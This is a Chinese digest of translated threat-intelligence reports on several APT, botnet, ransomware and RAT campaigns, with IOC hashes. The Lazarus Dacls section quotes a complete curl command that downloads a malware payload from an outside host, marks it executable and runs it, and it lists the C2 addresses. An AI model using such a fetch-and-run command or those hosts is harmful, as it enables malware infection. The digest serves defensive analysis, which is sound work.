分类: 威胁情报

COMpfun 操作者利用基于 HTTP 状态的木马欺骗签证申请

2019年秋,相关网站发布了一篇文章,其主要讲述了一个名为Reducor的COMpfun后继文件是如何即时感染文件以破坏TLS流量的,目前该恶意软件的开发者们还在开发新的功能。同年11月下旬,相关搜索引擎发现了一个新的木马,其之前发现的代码高度相似,经过进一步的研究表明,它使用的是与COMPFun相同的代码库。 本次恶意活动幕后操纵者聚焦于外交实体上,其目标是在欧洲。他们将最初的释放器以伪造签证申请的形式进行传播。合法的应用程序及32位或64位的恶意软件被保存在加密释放器中,但恶意代码是如何传递到目标中的这点我们尚不清楚。     …… 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1212/     消息来源:securelist, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

Mirai 和 Hoaxcalls 僵尸网络瞄准旧版赛门铁克 Web 网关

作为Unit 42主动监控野外传播威胁工作的一部分,我最近发现了新的Hoaxcalls和Mirai僵尸网络活动,是针对赛门铁克安全Web网关5.0.2.8中的身份验证后的远程执行代码漏洞。该产品已逐渐淘汰,于2015年到期,产品支持于2019年到期。目前还没证据表明其他版本的固件易受攻击,我已与赛门铁克共享这些发现。他们证实赛门铁克Web网关5.2.8中已不再存在当前被利用的漏洞,他们还想强调一点,此漏洞不会影响安全的Web网关解决方案,包括代理程序和Web安全服务。 2020年4月24日,第一个利用该漏洞的攻击实例浮出水面,这是同月早些时候首次发现的僵尸网络演化的一部分。这个最新版本的Hoaxcalls支持其它命令,这些命令允许攻击者对受感染的设备进行更大的控制,比如代理通信、下载更新、保持跨设备重启的持久性或防止重启,以及可以发起更多的DDoS攻击。在漏洞细节公布的几天后,就开始在野外使用该漏洞利用程序,这说明了一个事实,这个僵尸网络的作者一直在积极测试新漏洞的有效性。 此后,在5月的第一周,我还发现了一个Mirai变体活动,其中涉及使用相同的漏洞利用,尽管在该活动中,样本本身不包含任何DDoS功能。相反,它们的目的是使用证书暴力进行传播以及利用赛门铁克Web网关RCE漏洞。本文讲述有关这两个活动值得注意的技术细节。 …… 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1211/     消息来源:PaloAltoNetworks, 译者:吴烦恼。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接  

Mikroceen 后门程序:对中亚地区政府机构和组织进行秘密间谍活动

ESET研究人员剖析了部署在针对亚洲两个重要基础设施领域的多个政府机构和主要组织的攻击中的后门程序。 在这篇与Avast研究员的联合博文中,我们提供了一项技术分析,介绍一种不断发展的RAT技术,自2017年末以来,它被用于各种针对公共和私人目标的间谍活动中。我们观察到该RAT的多起攻击实例,而且都发生在中亚地区。目标对象包括电信和天然气行业中的几家重要公司以及政府机构。 此外,我们把最新的间谍活动与之前发表的三篇报道联系起来:卡巴斯基(Kaspersky)对针对俄罗斯军事人员的Microcin的报道、Palo Alto Networks对针对白俄罗斯政府的BYEBY的报道,以及Checkpoint对针对蒙古公共部门的Vicious Panda的报道。此外,我们还讨论了通常是攻击者工具集中一部分的其他恶意软件。我们选择了“Mikroceen”这个名字来涵盖RAT的所有实例,以感谢卡巴斯基关于这个恶意软件家族的最初报告。这里的拼写错误是我们有意的,为了区别已有的微生物概念,同时也保持发音一致。 …… 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1206/   消息来源:welivesecurity, 译者:吴烦恼。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

针对南亚政府和军事组织的 BackConfig 恶意软件

Unit 42安全团队在过去4个月里观察到了Hangover组织(又名Neon, Viceroy Tiger, MONSOON)使用的BackConfig恶意软件的活动。该组织使用鱼叉式钓鱼攻击,目标包括南亚的政府和军事组织。 BackConfig定制木马具有灵活的插件架构,用于提供各种特性的组件,包括收集系统和键盘记录信息以及上传和执行额外payload的能力。 最初,感染是通过一个武器化的Microsoft Excel (XLS)文档发生的,该文档通过受感染的合法网站发布,url很可能是通过电子邮件共享的。这些文档使用Visual Basic for Applications (VBA)宏代码,如果受害者启用了这些宏代码,就会启动一个由多个组件组成的安装过程,从而导致插件加载程序payload被下载和执行。模块化的特性当然允许对单个组件进行更快的更改,而且对于攻击者来说可能更重要的是,能够阻止沙箱和动态分析系统的方式拆分恶意行为,尤其是在单独分析组件时。 我们基于WildFire的威胁预防平台可以检测到与此组织相关的活动,同时更新PAN-DB URL过滤解决方案中的“恶意软件”类别,用于已识别恶意的或受危害的域名。 …… 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1202/   消息来源:PaloAltoNetworks, 译者:吴烦恼。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

针对欧洲组织的新的僵尸网络 Outlaw 再度来袭

在我们的日常监控中,我们拦截了一个试图渗透客户网络的Linux恶意软件,该恶意软件是著的“ Shellbot ”,被定义为“ Outlaw Hacking Group”的犯罪工具。 早在2018年,TrendMicro首次发现“Outlaw Hacking Group”,该犯罪团伙主攻汽车和金融业,而Outlaw僵尸网通过暴力登录以及SSH漏洞(利用Shellshock Flaw和Drupalgeddon2漏洞)来实现对目标系统(包括服务器和IoT设备)的远程访问。其中,TrendMicro首次发现的版本还包含一个DDoS脚本,botmaster可以使用该脚的原有设置在暗网上提供的DDoS for-hire服务。 该恶意软件植入程序的主要组件是“Shellbot”变体,它是一个Monero矿机,与一个基于perl的后门捆绑在一起,包括一个基于IRC的bot和一个SSH扫描器。Shellbot自2005年被熟知,近期其出现在网络安全领域,使用的是全新的IRC服务器和全新的Monero pools,攻击目标针对全球组织。   更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1204/   消息来源:YOROI, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

NEMTY 的继任者——Nefilim/Nephilim 勒索软件

现在是一个研究跟踪勒索软件趋势的有趣时机,特别是在过去的一两年里,我们已经看到“主流”勒索软件甚至进一步扩展到了数据勒索和盗窃领域。对文件进行加密是一回事,但必须将每一个勒索软件感染都视为违规行为,这给这些攻击活动的受害者增加了多层复杂性。对于GDPR以及现在类似法律和合规性障碍,这尤其复杂。 勒索软件家族,如Maze、CLOP、DoppelPaymer、Sekhmet和Nefilim/Nephilim都是威胁的案例,一旦感染,就会给受害者带来相当复杂的问题。虽然Maze、DopplePayer和REvil往往会得到大量媒体报道,但Nephilim是另一个迅速发展的家族,它发起了多起破坏性活动。如果受害者不能“配合”他们的要求,他们就会公布受害者的敏感信息。   概述 Nefilim出现于2020年3月,与另一个勒索软件家族NEMTY共享相当一部分代码。NEMTY和Nefilim/Nephilim背后的确切关系尚不清楚。 NEMTY于2019年8月作为一个公共项目推出,之后转为私有。目前的数据表明,在这两个家族背后的不是同一个人,更有可能的是,Nephilim背后的人以某种方式从NEMTY那里“获得”了必要的代码。 Nefilim和NEMTY的两个主要区别是支付模式,以及缺少RaaS操作。Nefilim指示受害者通过电子邮件与攻击者联系,而不是将他们引导到基于torm的支付网站。为了使家谱更加混乱,Nefilim似乎演变为了“Nephilim”,两者在技术上相似,主要区别在于扩展名和加密文件中的工件。 然而,也有情报表明,NEMTY已经继续并分支到一个新的“NEMTY Revenue”版本。在此之前,NEMTY的幕后主使宣布他们将把威胁私有化(不再公开访问RaaS行动)。 从技术上讲,Nephilim与其他著名的勒索软件家族没有什么不同。目前主要的传播方法是利用易受攻击的RDP服务。一旦攻击者通过RDP破坏了环境,他们就会继续建立持久性,在可能的情况下查找和窃取其他凭证,然后将勒索软件的payload传播给潜在目标。   Nephilim加密协议 在Nephilim样本中我们分析了实际的文件加密是通过标签组AES-128和RSA-2048处理的。注意,Nefilim/Nephilim背后的原始供应商也这样做。 特定的文件使用AES-128加密。此时,使用RSA-2048公钥加密AES加密密钥。公钥随后被嵌入到勒索软件的可执行payload中。这是一个不同于纯NEMTY的区域,后者已知使用了不同的密钥长度。例如,早期版本的NEMTY使用RSA-8192作为“主密钥”,用于加密目标配置数据和其他密钥(src: Acronis)。 我们还知道NEMTY的变体使用RSA-1024公钥来处理AES加密密钥。此外,在早期版本的NEMTY中,处理特定大小范围的文件的方式也存在差异。NEMTY的后续版本(又名NEMTY REVENUE 3.1)在计数器模式下利用AES-128和RSA-2048加密AES密钥。 目前,只有Nephilim背后的参与者能够解密受影响的文件。也就是说,没有已知的漏洞或方法来绕过攻击者对加密文件的保护。   感染后的行为 感染后,加密文件的扩展名为.nefilim或.Nephilim。在包含加密文件的目录中存放着类似的名为ransom的记录。 在某些情况下,对于Nephilim,“nephilm – decrypt.txt”将只写入~\AppData\Local\VirtualStore。本地存储的桌面壁纸的位置和名称各不相同。在最近的Nephilim感染中,备用桌面映像被写入%temp%,文件名为’ god.jpg ‘。   字符串,区别特征 Nephilim的另一个特点是使用嵌入的字符串和编译器路径来发送“微妙的信息”,主要是向研究人员和分析人员发送。例如,以下编译器路径可以在这些示例中找到(均在2020年4月7日编译): b8066b7ec376bc5928d78693d236dbf47414571df05f818a43fb5f52136e8f2e fcc2921020690a58c60eba35df885e575669e9803212f7791d7e1956f9bf8020 而样本为: d4492a9eb36f87a9b3156b59052ebaf10e264d5d1ce4c015a6b0d205614e58e3 从2020年3月开始包含对特定AV厂商的额外攻击。 该样本来源于@malwrhunterteam 在3月13号的推文。 羞辱策略 Nefilim/Nephilim还威胁说,如果受害者拒绝配合要求,他们将公布敏感信息,这一点在这张典型的Nephilim勒索信中得到了证明。 受害者试图谈判或拒绝付款都属于不遵守规定的范畴。迄今为止,已有两家公司在Nephilim的“shaming”网站(clearnet和基于TOR的网站)上发布。值得注意的是,最初,其网站上列出的所有公司都是石油和能源公司。但是,在2020年4月23日至4月27日期间,该组织又在现场增加了三名受害者。其中一家是另一家大型石油和天然气公司,另外两家则被归类为“服装和时装”和“工程与建筑服务”。 其他多个勒索软件家族也遵循相同的做法,将“基本”勒索软件感染转变为完全(有时是灾难性的)数据泄露。使用该模型的其他知名家族包括Maze、REvil DoppelPaymer、CLOP、Sekhmet,以及最近的Ragnar。我们注意到,Nefilim/Nephilim也是“发誓”在当前新冠疫情大流行期间不攻击医疗实体、非营利组织和其他“关键”实体的家族之一。 结论 保护你的环境免受像Nephilim这样的威胁比以往任何时候都更加重要。为了防止数据丢失和大规模数据泄露的后果,企业必须依赖于一个现代的、受良好维护的、适当调整的、受信任的安全解决方案。预防是这些攻击的关键。即使可以通过解密器、备份或回滚来减轻加密/数据丢失的情况,受害者仍然面临其数据公开发布的问题。我们鼓励我们的客户分析和理解威胁,并采取迅速而适当的行动以防止事故发生。 为了方便起见,我们在下面提供了SHA256和SHA1哈希。 SHA256 8be1c54a1a4d07c84b7454e789a26f04a30ca09933b41475423167e232abea2b b8066b7ec376bc5928d78693d236dbf47414571df05f818a43fb5f52136e8f2e 3080b45bab3f804a297ec6d8f407ae762782fa092164f8ed4e106b1ee7e24953 7de8ca88e240fb905fc2e8fd5db6c5af82d8e21556f0ae36d055f623128c3377 b227fa0485e34511627a8a4a7d3f1abb6231517be62d022916273b7a51b80a17 3bac058dbea51f52ce154fed0325fd835f35c1cd521462ce048b41c9b099e1e5 353ee5805bc5c7a98fb5d522b15743055484dc47144535628d102a4098532cd5 5ab834f599c6ad35fcd0a168d93c52c399c6de7d1c20f33e25cb1fdb25aec9c6 52e25bdd600695cfed0d4ee3aca4f121bfebf0de889593e6ba06282845cf39ea 35a0bced28fd345f3ebfb37b6f9a20cc3ab36ab168e079498f3adb25b41e156f 7a73032ece59af3316c4a64490344ee111e4cb06aaf00b4a96c10adfdd655599 08c7dfde13ade4b13350ae290616d7c2f4a87cbeac9a3886e90a175ee40fb641 D4492a9eb36f87a9b3156b59052ebaf10e264d5d1ce4c015a6b0d205614e58e3 B8066b7ec376bc5928d78693d236dbf47414571df05f818a43fb5f52136e8f2e fcc2921020690a58c60eba35df885e575669e9803212f7791d7e1956f9bf8020 SHA1 4595cdd47b63a4ae256ed22590311f388bc7a2d8 1f594456d88591d3a88e1cdd4e93c6c4e59b746c 6c9ae388fa5d723a458de0d2bea3eb63bc921af7 9770fb41be1af0e8c9e1a69b8f92f2a3a5ca9b1a e99460b4e8759909d3bd4e385d7e3f9b67aa1242 e53d4b589f5c5ef6afd23299550f70c69bc2fe1c c61f2cdb0faf31120e33e023b7b923b01bc97fbf 0d339d08a546591aab246f3cf799f3e2aaee3889 bbcb2354ef001f476025635741a6caa00818cbe7 2483dc7273b8004ecc0403fbb25d8972470c4ee4 d87847810db8af546698e47653452dcd089c113e E94089137a41fd95c790f88cc9b57c2b4d5625ba Bd59d7c734ca2f9cbaf7f12bc851f7dce94955d4 f246984193c927414e543d936d1fb643a2dff77b d87847810db8af546698e47653452dcd089c113e     消息来源:SentinelLABS, 译者:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

通过 Trojanized 2FA 应用程序散播 Lazarus Dacls RAT 的 Mac 新变种木马

有关研究团队最新发现了一种新的Dacls远程访问特洛伊木马(RAT)变种,它与朝鲜的Lazarus集团有关联,并且专门为Mac操作系统设计。 Dacls是2019年12月奇虎360 NetLab发现的一种针对Windows和Linux平台的全功能隐蔽远程访问特洛伊木马(RAT)。 这个Mac变种至少通过一个名为MinaOTP的木马化的macOS二元身份验证应用程序进行分发,该应用程序主要由中国用户使用。与Linux变种类似,它拥有多种功能,包括命令执行、文件管理、流量代理和蠕虫扫描。 发现 4月8日,一个名为“TiNakOTP”的可疑Mac应用程序从香港提交到VirusTotal,当时没有任何引擎检测到它。 恶意的bot可执行文件位于应用程序的“Contents/Resources/Base.lproj/”目录中,当它是Mac可执行文件时,它会伪装成nib文件(“SubMenu.nib”)。它包含字符串“c_2910.cls”和“k_3872.cls”,而这是以前检测到的证书和私钥文件的名称。 持久性 该RAT通过LaunchDaemons或LaunchAgents持久存在,它们采用属性列表(plist)文件,这个文件指定了重启后需要执行的应用程序。LaunchAgents和LaunchDaemons之间的区别在于,LaunchAgents代表登录用户运行代码,而LaunchDaemons以root用户运行代码。“ 当恶意应用程序启动时,它将在“Library/LaunchDaemons”目录下创建一个名称为“com.aex-loop.agent.plist”的plist文件,plist文件的内容在应用程序中进行了硬编码。 该程序还会检查“getpwuid( getuid() )”是否返回当前进程的用户ID。如果返回用户ID,它将在LaunchAgents目录“Library/LaunchAgents/”下创建plist文件“com.aex-loop.agent.plist”。 图1 plist文件 存储plist的文件名和目录为十六进制格式并附加在一起,它们向后显示文件名和目录。 图2 目录和文件名生成 配置文件 配置文件包含有关受害者计算机的信息,例如Puid、Pwuid、插件和C&C服务器,配置文件的内容使用AES加密算法进行加密。 图3 加载配置 Mac和Linux变种都使用相同的AES密钥和IV来加密和解密配置文件,两种变种中的AES模式均为CBC。 图4 AES密钥和IV 配置文件的位置和名称以十六进制格式存储在代码中,该配置文件名称伪装成与Apple Store相关的数据库文件:“Library/Caches/Com.apple.appstore.db”。 图5 配置文件名 “IntializeConfiguration”功能使用以下硬编码的C&C服务器初始化配置文件。 图6 初始化配置文件 通过从C&C服务器接收命令来不断更新配置文件。安装后的应用程序名称为“mina”。Mina来自MinaOTP应用程序,它是针对macOS的双因素身份验证应用程序。 图7 配置文件正在更新 主循环 初始化配置文件后,执行主循环以执行以下四个主命令: 将C&C服务器信息从配置文件上载到服务器(0x601) 从服务器下载配置文件内容并更新配置文件(0x602) 通过调用“getbasicinfo”函数(0x700)从受害者的计算机上传收集的信息 发送heartbeat信息(0x900) 命令代码与Linux.dacls完全相同。 图8 主循环 插件 此Mac-RAT拥有Linux变种中的所有六个插件,以及一个名为“SOCKS”的附加插件。这个新插件用于代理从受害者到C&C服务器的网络流量。 该应用程序会在主循环开始时加载所有七个插件。每个插件在配置文件中都有自己的配置部分,将在插件初始化时加载。 图9 加载的插件 CMD插件 cmd插件类似于Linux rat中的“bash”插件,它通过为C&C服务器提供一个反向shell来接收和执行命令。 图10 CMD插件 文件插件 文件插件具有读取、删除、下载和搜索目录中文件的功能。Mac和Linux变种之间的唯一区别是Mac变种不具有写入文件的能力(case 0)。 图11 文件插件 进程插件 进程插件具有终止、运行、获取进程ID和收集进程信息的功能。 图12 进程插件 如果可以访问进程的“ / proc /%d / task”目录,则插件将从进程获取以下信息,其中%d是进程ID: 通过执行“/ proc /%/ cmdline”获取进程的命令行参数 “/ proc /%d / status”文件中进程的名称、Uid、Gid、PPid 测试插件 Mac和Linux变种之间的测试插件的代码是相同的,它检查到C&C服务器指定的IP和端口的连接。 RP2P插件 RP2P插件是一个代理服务器,用于避免受害者与参与者的基础设施进行直接通信。 图13 反向P2P LogSend插件 Logsend插件包含三个模块: 检查与日志服务器的连接 扫描网络(蠕虫扫描仪模块) 执行长期运行的系统命令 图14 Logsend插件 该插件使用HTTP端口请求发送收集的日志。 图15 用户代理 这个插件中一个有趣的功能是蠕虫扫描程序。“start_worm_scan”可以扫描端口8291或8292上的网络子网,要扫描的子网是基于一组预定义规则确定的。下图显示了选择要扫描的子网的过程。 图16 蠕虫扫描 Socks插件 Socks插件是此Mac Rat中新增的第七个插件,它类似于RP2P插件,并充当引导bot和C&C基础结构之间通信的媒介,它使用Socks4进行代理通信。 图17 Socks4 网络通讯 此Mac-RAT使用的C&C通信与Linux变种类似,为了连接到服务器,应用程序首先建立一个TLS连接,然后执行beaconing操作,最后使用RC4算法对通过SSL发送的数据进行加密。 图18 应用程序生成的流量(.mina) 图19 TLS连接 Mac和Linux变种都使用WolfSSL库进行SSL通信,WolfSSL通过C中的TLS的开源实现,支持多个平台。这个库已被多个威胁参与者使用,例如,Tropic Trooper在其Keyboys恶意软件中使用了这个库。 图20 WolfSSL 用于beaconing的命令代码与Linux.dacls中使用的代码相同,这是为了确认bot和服务器的身份。 图21 Beaconing RC4密钥是通过使用硬编码密钥生成的。 图22 RC4初始化 变体和检测 我们还确定了此RAT的另一个变体,该变体使用以下curl命令下载恶意负载:curl -k -o〜/ Library / .mina https://loneeaglerecords.com/wpcontent/uploads/2020/01/images.tgz.001>/ dev / null 2>&1 && chmod + x〜/ Library / .mina> /dev / null 2>&1 &&〜/ Library / .mina> / dev。 我们认为,Dcals RAT的Mac变体与Lazarus小组(也称为Hidden Cobra和APT 38)有关,Lazarus小组是自2009年以来一直从事网络间谍活动和网络犯罪的臭名昭著的朝鲜恐怖组织。 据悉,该组织是最成熟的参与者之一,能够针对不同平台定制恶意软件。这个Mac-RAT的发现表明,APT小组正在不断开发其恶意软件工具集。 Mac的Malwarebytes将该远程管理木马检测为OSX-DaclsRAT。 IOCs 899e66ede95686a06394f707dd09b7c29af68f95d22136f0a023bfd01390ad53 846d8647d27a0d729df40b13a644f3bffdc95f6d0e600f2195c85628d59f1dc6 216a83e54cac48a75b7e071d0262d98739c840fd8cd6d0b48a9c166b69acd57d d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd   loneeaglerecords[.]com/wp-content/uploads/2020/01/images.tgz.001 67.43.239.146 185.62.58.207 50.87.144.227   消息来源:malwarebytes, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

海莲花(OceanLotus) APT组织滥用合法证书传播高级 Android 威胁

2014年以来,海莲花(OceanLotus)APT组织(或被称为PhantomLance)就以通过官方和第三方市场传播高级Android威胁而闻名。他们试图远程控制受感染的设备、窃取机密数据、安装应用程序并启动任意代码。 安全研究人员最近记录了该组织的活动,Bitdefender调查发现了该组织35个新的恶意样本,并证明其活动可能使用了合法且可能被盗的数字证书来对某些样本进行签名。 该APT组织的作案手法是先上传干净版本,然后添加恶意软件,然后通过Google Play和第三方市场传播恶意Android应用。 安全研究人员认为,海莲花APT组织与Android恶意软件和过去基于Windows的高级威胁的命令和控制域之间的共享基础结构相关联,这些威胁过去一直以Microsoft用户为目标。可以说,这些较早的活动也与Hacking Team组织有联系,该组曾为APT32组织服务。 虽然海莲花主要针对非洲和亚洲,但Bitdefender遥测技术还可以在日本、韩国、越南、德国和印度等国家进行扫描。 Bitdefender 检测到此威胁为  Android.Trojan.OceanLotus。 寻找“零号病人” 在Bitdefender存储库(APK MD5:315f8e3da94920248676b095786e26ad)中找到的,与海莲花APT组织所关联的最古老的样本似乎已于2014年4月首次登陆Google Play 。可追溯到最早的已知Google Play样本在2014年12月。 根据内部zip文件时间戳记,该样本构建于2014年4月5日,几天后就被我们记录下。 一个有趣的发现是,该样本已使用VL Corporation的证书进行了签名。 该证书于2013年7月生成,并且直到2014年为止,除OceanLotus Malware以外,Google Play上已有100多个不同的应用程序在使用它。这表明网络犯罪集团可能已使用有效证书成功地将恶意病毒app走私到了Google Play中。 Certificate:      Data:          Version: 3 (0x2)          Serial Number: 2002933886 (0x7762587e)          Signature Algorithm: sha256WithRSAEncryption          Issuer: C=VN, ST=10000, L=HN, O=VL Corporation, OU=VL Corporation, CN=VL Corporation          Validity              Not Before: Jul 22 18:57:09 2013 GMT              Not After : Jul 16 18:57:09 2038 GMT          Subject: C=VN, ST=10000, L=HN, O=VL Corporation, OU=VL Corporation, CN=VL Corporation 他的证书很可能已被该APT组织泄漏和滥用。目前,在Google Play中使用此证书签名的100多个应用程序中,仍然没有该应用程序。 目标国家 在遥测方面,仅在过去的3个月中,我们就收到25篇涉及此威胁的报告,其中大多数是在美国、日本和韩国。显然,在美国的报告可能不是真实的设备,但亚马逊托管的Android计算机被操纵来运行样本以进行安全分析,对于安全研究人员而言,执行这种沙箱操作并不少见,特别是在尝试获取危害指标或研究恶意行为时。 但是,韩国和日本的报告确实表明,最近遇到过海莲花APT样本的设备至少数量有限。 Android OceanLotus报告威胁的十大国家 追踪传播 在传播方面,虽然安全研究人员已经报告说恶意软件的发行是通过官方的Google Play市场和第三方市场进行的,但一些与Google Play相似的市场仍在托管这些样本。这意味着,尽管Google在及时管理其应用程序并响应安全研究人员和供应商方面做得很出色,但第三方市场(如果有的话)缓慢地消除了这些威胁,甚至有可能无限期地使用户暴露于恶意软件中。 仍托管这些恶意样本的第三方市场的一些样本包括: hxxps://apkpure.com/opengl-plugin/net.vilakeyice.openglplugin hxxps://apk.support/app/net.vilakeyice.openglplugin hxxps://apkplz.net/app/com.zimice.browserturbo hxxps://apk.support/app/com.zimice.browserturbo hxxps://androidappsapk.co/download/com.techiholding.app.babycare/ hxxps://www.apkmonk.com/app/com.techiholding.app.babycare/ hxxps://apkpure.com/cham-soc-be-yeu-babycare/com.techiholding.app.babycare hxxps://apk.support/app-th/com.techiholding.app.babycare 虽然已经有了海莲花APT组织的样本完整列表,我们知道这些样本已出现在Google Play中,但我们添加了以下一些内容,这些内容也已在Google Play上得到确认。 由Bitdefender研究人员发现的海莲花APT组织的其他新样本的md5完整列表如下: 3043a2038b4cb0586f5c52d44be9127d f449cca2bc85b09e9bf4d3c4afa707b6 76265edd8c8c91ad449f9f30c02d2e0b 5d909eff600adfb5c9173305c64678e7 66d4025f4b60abdfa415ebd39dabee49 7562adab62491c021225166c7101e8a1 7b8cba0a475220cc3165a7153147aa84 63e61520febee25fb6777aaa14deeb4a 9236cf4bf1062bfc44c308c723bda7d4 f271b65fa149e0f18594dd2e831fcb30 e6363b3fae89365648b3508c414740cd d9e860e88c22f0b779b8bacef418379e 3d4373015fd5473e0af73bdb3d65fe6a a57bac46c5690a6896374c68aa44d7b3 08663152d9e9083d7be46eb2a16d374c 18577035b53cae69317c95ef2541ef94 eee6dcee1ab06a8fbb8dc234d2989126 5d07791f6f4d892655c3674d142fe12b f0ea1a4d81f8970b0a1f4d5c41f728d8 320e2283c8751851362b858ad5b7b49c 1fb9d7122107b3c048a4a201d0da54cd bb12cc42243ca325a7fe27f88f5b1e1b 01b0b1418e8fee0717cf1c5f10a6086b 4acf53c532e11ea4764a8d822ade9771 6ff1c823e98e35bb7a5091ea52969c6f 1e5213e02dd6f7152f4146e14ba7aa36 3fe46408a43259e400f7088c211a16a3 c334bade6aa52db3eccf0167a591966a 53ba3286a335807e8d2df4aae0bd0977 7f59cb904e2e0548b7f0db12c08b9e25 49d1c82a6b73551743a12faec0c9e8b1 6b323840d7cb55bb5c9287fc7b137e83 2e1ed1f4a5c9149c241856fb07b8216b 6737fba0f2b3ea392f495af9a0aa0306 bda442858c33ae7d9f80227c55f6a584 规避Google Play保护 攻击者通常向Google Play提交一个干净的版本,然后随机等待一段时间,再简单地使用恶意代码更新应用程序。网络犯罪分子似乎也使用了这种策略。 例如,应用程序net.vilakeyice.openglplugin(OpenGLPlugin)最初于 2018 年8月5 日以纯净格式上传,然后在8月21日引入了恶意payload。 APK Seen on Google Play No Payload 7285f44fa75c3c7a27bbb4870fc0cdca 2018.08.05 With Payload d924211bef188ce4c19400eccb6754da 2018.08.21 然后,将payload解密并动态加载到应用程序中。如果较旧的样本将解密密钥本地嵌入在原始的干净应用程序中,则较新的样本将不再将其存储在本地,因为它们似乎接收了解密密钥以及恶意payload。 归因和可用性 尽管这些Android恶意软件样本的归属已经成为安全行业分析的主题,但海莲花APT组织已经被标记为幕后主谋。不过样本仍存在于第三方市场这一事实应当引起注意。 某些时候Google Play上的某些样本目前仍可在第三方市场上获得,  包括在Amazon上。在世界各地可能无法从官方Google Play市场访问内容的地区,用户仍然有感染这种恶意软件的风险。 在亚马逊印度的这个特定样本中,开发人员名称为Caleb Eisenhauer(假名),该应用程序似乎已于 2020 年2月16日发布。与该帐户关联的电子邮件地址(malcesshartspur@gmail.com)发送至托管在GitHub(https://github.com/malcesshartspur)上的隐私政策。 可能存在类似的虚假开发者帐户,它们都在第三方市场上散布了各种样本,如果不删除,有可能在很长一段时间内感染受害者。     消息来源:Bitdefender, 译者:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接